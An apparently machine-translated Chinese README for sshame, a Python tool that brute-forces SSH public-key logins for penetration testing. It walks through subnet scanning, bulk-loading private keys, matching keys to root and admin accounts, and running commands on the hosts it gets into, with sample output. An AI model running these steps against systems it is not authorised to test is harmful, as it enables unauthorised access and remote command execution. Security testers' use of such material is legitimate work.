ssh公钥暴力工具
sshame的Python项目详细描述
sshame-ssh公钥暴力工具
使用交互式工具强制ssh公钥身份验证。主要是用于压力测试仪。sshame可以在远程主机上执行命令。
版本历史记录
sshame 0.5-2019-08-25
初始版本
安装
从github克隆源代码:
git clone https://github.com/HynekPetrak/sshame.git
cd shame
然后要安装,请运行:
sudo python3 setup.py install
如果您想贡献而不是安装运行:
sudo python3 setup.py develop
基本用法
sshame是交互式的,基于https://github.com/python-cmd2/cmd2
# sshame
(sshame)
键入“帮助”以获取命令列表: (sshame)帮助
Documented commands (type help <topic>):
Sshame
======
commands creds exploit hosts keys resolve session
Uncategorized
=============
alias help macro py record run_script shell
edit history playback quit run_pyscript set shortcuts
添加目标主机
在sshame shell中运行hosts -a list-of-ip-ranges-or-hosts [-p port]
:
(sshame) hosts -a 10.0.0.0/24 -p 22
Scanning 10.0.0.0/24 on port(s) 22
........***.............
Received 877 packets, got 222 answers, remaining 34 packets
2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 10.0.0.2 22'
2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 10.0.0.1 22'
2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 10.0.0.6 22'
sshame将使用scapy扫描给定的主机并添加那些打开端口的主机。
要使用TCP端口打开来验证添加的主机,请运行hosts -l
加载ssh密钥
使用keys -a glob_path [-p list-of-passwords]
(sshame) keys -a test/**/*key
2019-08-25 19:30:40,613 sshame [I] "Adding ssh keys from: ['test/**/*key']"
2019-08-25 19:30:40,614 sshame [I] "Discovered 4 files in 'test/**/*key'."
2019-08-25 19:30:40,615 sshame [I] 'Going to examine 4 files.'
2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'
2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'
2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'
2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'
Loaded 4 unique keys, ignoring 0 duplicates
-p list-of-passwords
在加载受密码保护的加密私钥时是可选的。
使用keys -l
主机上的测试密钥
强制哪个密钥验证哪个目标运行exploit -u list-of-users
:
(sshame) exploit -u root admin
2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'
2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'
列出匹配键与creds -l
:
(sshame) creds -l
[1/1/1]: ssh -i test/keys/rsa_key root@10.0.0.2
[2/2/1]: ssh -i test/keys/dsa_key admin@10.0.0.1
在远程主机上运行命令
要在远程主机上运行命令,请使用exploit -c command
,例如:
(sshame) exploit -c whoami
2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'
2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'
显示命令结果
用commands -r
显示结果:
(sshame) commands -r
Entries: 2
| guid | host_address | host_port | username | cmd | exit_status | output | updated |
|--------------------------------------+----------------+-------------+------------+----------------------+---------------+-----------------+---------------------|
| 434f163a-24b5-4775-a3c1-6ea41745b18d | 10.0.0.2 | 22 | root | whoami | 0 | root | 2019-08-25 21:28:23 |
| 305e3f5d-bf4d-4024-981a-59b2dddebbcd | 10.0.0.1 | 22 | admin | whoami | 0 | admin | 2019-08-25 21:28:23 |
会话管理
您可能需要将工作负载分成几个会话。使用session name
在会话之间切换。默认会话为
称为“默认”。
每个会话的数据都存储在一个单独的sqlite数据库中,该数据库位于以会话命名的当前目录中
名称,例如default.db
(sshame) session test
2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'